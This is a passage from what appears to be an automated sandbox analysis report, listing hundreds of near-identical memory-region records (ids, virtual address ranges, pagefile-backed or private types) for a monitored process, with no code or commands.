0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11242 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11243 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11244 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11245 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11246 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11247 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11248 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11249 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11250 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11251 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11252 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11255 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11256 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11257 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11258 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11259 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11260 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11261 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11262 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11263 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11264 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11265 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11266 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11267 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11268 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11269 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11270 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11271 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11272 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11273 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11274 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11275 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11276 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11277 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11278 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11279 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11280 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11281 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11282 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11283 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11284 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11285 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11286 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11287 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11288 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11289 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11290 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11291 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11292 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11293 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11294 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11295 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11296 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11297 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11298 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11299 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11300 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11301 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11302 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11303 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11304 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11305 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11306 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11307 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11308 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11309 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11310 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11311 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11312 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11313 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11314 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11315 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11316 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11317 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11318 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11319 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11320 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11321 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11322 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11323 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11325 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 11326 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 11327 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 11328 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11329 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11330 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11331 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11332 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11333 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11334 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11335 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11336 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11337 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11338 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11339 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11340 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11341 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11342 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11343 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11344 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11345 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11346 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11347 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11348 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11349 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11350 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11351 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11352 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11353 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11354 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11355 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11356 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11357 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11358 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11359 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11360 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11361 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11362 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11363 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11364 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11365 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11366 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11367 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11368 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11369 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11370 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11371 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11372 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11373 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11374 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11375 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11376 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11377 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11378 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11379 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11380 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11381 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11382 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11383 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11384 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11385 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11386 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11387 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11388 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11389 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11390 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11391 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11392 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11393 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11394 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11395 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11396 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11397 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11398 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11399 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11400 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11401 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11402 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11403 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11404 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11405 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11406 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11407 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11408 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11409 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11410 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11411 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11412 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11413 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11414 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11419 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11420 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11421 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11422 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11423 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11424 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11425 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11426 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11427 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11428 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11429 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11430 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11431 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11432 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11433 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11434 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11435 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 